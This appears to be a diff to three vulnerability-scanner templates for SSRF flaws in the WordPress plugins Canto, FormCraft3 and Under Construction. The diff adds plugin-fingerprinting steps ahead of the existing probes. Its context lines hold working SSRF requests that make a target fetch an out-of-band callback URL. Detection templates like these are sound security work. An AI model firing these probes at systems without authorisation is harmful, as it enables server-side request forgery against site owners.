diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 989df6769d..fe452435e7 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/canto/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Canto' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index d6a1ed0594..33835011a6 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -30,7 +30,19 @@ info: fofa-query: body="formcraft3" && body="wp-" tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/formcraft3/' + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}' diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml index ca5e2ae432..764d019c4e 100644 --- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -14,7 +14,20 @@ info: max-request: 1 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= Under Construction' + - raw: - | POST /wp-admin/admin-ajax.php HTTP/2